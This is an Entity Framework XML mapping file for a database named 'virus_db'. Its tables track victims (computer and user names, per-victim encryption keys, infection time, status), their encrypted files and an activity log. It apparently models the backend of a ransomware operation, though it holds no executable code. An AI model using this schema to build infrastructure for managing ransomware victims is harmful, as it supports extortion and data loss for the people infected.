<?xml version="1.0" encoding="utf-8"?>
<Mapping Space="C-S" xmlns="http://schemas.microsoft.com/ado/2009/11/mapping/cs">
  <EntityContainerMapping StorageEntityContainer="Хранилище virus_dbModelContainer" CdmEntityContainer="virus_dbEntities1">
    <EntitySetMapping Name="activity_log">
      <EntityTypeMapping TypeName="virus_dbModel.activity_log">
        <MappingFragment StoreEntitySet="activity_log">
          <ScalarProperty Name="log_id" ColumnName="log_id" />
          <ScalarProperty Name="victim_id" ColumnName="victim_id" />
          <ScalarProperty Name="action_type" ColumnName="action_type" />
          <ScalarProperty Name="action_details" ColumnName="action_details" />
          <ScalarProperty Name="action_time" ColumnName="action_time" />
        </MappingFragment>
      </EntityTypeMapping>
    </EntitySetMapping>
    <EntitySetMapping Name="encrypted_files">
      <EntityTypeMapping TypeName="virus_dbModel.encrypted_files">
        <MappingFragment StoreEntitySet="encrypted_files">
          <ScalarProperty Name="file_id" ColumnName="file_id" />
          <ScalarProperty Name="victim_id" ColumnName="victim_id" />
          <ScalarProperty Name="file_path" ColumnName="file_path" />
          <ScalarProperty Name="file_ext" ColumnName="file_ext" />
          <ScalarProperty Name="file_size" ColumnName="file_size" />
        </MappingFragment>
      </EntityTypeMapping>
    </EntitySetMapping>
    <EntitySetMapping Name="sysdiagrams">
      <EntityTypeMapping TypeName="virus_dbModel.sysdiagram">
        <MappingFragment StoreEntitySet="sysdiagrams">
          <ScalarProperty Name="name" ColumnName="name" />
          <ScalarProperty Name="principal_id" ColumnName="principal_id" />
          <ScalarProperty Name="diagram_id" ColumnName="diagram_id" />
          <ScalarProperty Name="version" ColumnName="version" />
          <ScalarProperty Name="definition" ColumnName="definition" />
        </MappingFragment>
      </EntityTypeMapping>
    </EntitySetMapping>
    <EntitySetMapping Name="victims">
      <EntityTypeMapping TypeName="virus_dbModel.victim">
        <MappingFragment StoreEntitySet="victims">
          <ScalarProperty Name="victim_id" ColumnName="victim_id" />
          <ScalarProperty Name="computer_name" ColumnName="computer_name" />
          <ScalarProperty Name="user_name" ColumnName="user_name" />
          <ScalarProperty Name="encryption_key" ColumnName="encryption_key" />
          <ScalarProperty Name="files_count" ColumnName="files_count" />
          <ScalarProperty Name="infected_time" ColumnName="infected_time" />
          <ScalarProperty Name="status" ColumnName="status" />
        </MappingFragment>
      </EntityTypeMapping>
    </EntitySetMapping>
    <FunctionImportMapping FunctionImportName="sp_alterdiagram" FunctionName="Хранилище virus_dbModel.sp_alterdiagram" />
    <FunctionImportMapping FunctionImportName="sp_creatediagram" FunctionName="Хранилище virus_dbModel.sp_creatediagram" />
    <FunctionImportMapping FunctionImportName="sp_dropdiagram" FunctionName="Хранилище virus_dbModel.sp_dropdiagram" />
    <FunctionImportMapping FunctionImportName="sp_helpdiagramdefinition" FunctionName="Хранилище virus_dbModel.sp_helpdiagramdefinition">
      <ResultMapping>
        <ComplexTypeMapping TypeName="virus_dbModel.sp_helpdiagramdefinition_Result">
          <ScalarProperty Name="version" ColumnName="version" />
          <ScalarProperty Name="definition" ColumnName="definition" />
        </ComplexTypeMapping>
      </ResultMapping>
    </FunctionImportMapping>
    <FunctionImportMapping FunctionImportName="sp_helpdiagrams" FunctionName="Хранилище virus_dbModel.sp_helpdiagrams">
      <ResultMapping>
        <ComplexTypeMapping TypeName="virus_dbModel.sp_helpdiagrams_Result">
          <ScalarProperty Name="Database" ColumnName="Database" />
          <ScalarProperty Name="Name" ColumnName="Name" />
          <ScalarProperty Name="ID" ColumnName="ID" />
          <ScalarProperty Name="Owner" ColumnName="Owner" />
          <ScalarProperty Name="OwnerID" ColumnName="OwnerID" />
        </ComplexTypeMapping>
      </ResultMapping>
    </FunctionImportMapping>
    <FunctionImportMapping FunctionImportName="sp_renamediagram" FunctionName="Хранилище virus_dbModel.sp_renamediagram" />
    <FunctionImportMapping FunctionImportName="sp_upgraddiagrams" FunctionName="Хранилище virus_dbModel.sp_upgraddiagrams" />
  </EntityContainerMapping>
</Mapping>